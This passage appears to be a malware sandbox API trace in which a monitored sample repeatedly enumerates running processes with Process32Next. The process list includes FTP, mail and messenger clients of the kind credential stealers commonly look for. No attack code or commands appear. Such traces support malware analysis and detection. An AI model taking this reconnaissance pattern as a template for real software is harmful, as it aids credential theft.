out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.112] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.114] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0239.115] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.117] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0239.118] CloseHandle (hObject=0x1494) returned 1 [0239.118] Sleep (dwMilliseconds=0x64) [0239.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0239.252] Process32First (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.255] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.257] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.259] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.261] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.325] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.327] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.329] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.331] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.333] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.335] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.337] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.339] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.425] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.427] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.429] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.431] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.437] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.439] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.441] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.443] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0239.445] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0239.448] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.453] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.456] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0239.458] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0239.460] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0239.462] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.464] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.518] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0239.520] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.522] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.524] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0239.526] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0239.532] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0239.534] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0239.535] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0239.537] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0239.539] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0239.541] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0239.543] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0239.548] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0239.550] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0239.552] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0239.553] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0239.555] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0239.556] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0239.558] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0239.593] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0239.594] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0239.596] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0239.597] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0239.599] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0239.601] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0239.602] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0239.604] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0239.605] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0239.610] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0239.612] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0239.614] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0239.615] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0239.617] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0239.619] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0239.621] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0239.626] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0239.628] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0239.630] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0239.631] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0239.633] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0239.635] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0239.636] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0239.661] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0239.663] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0239.664] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0239.666] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0239.668] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0239.670] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0239.672] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0239.673] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 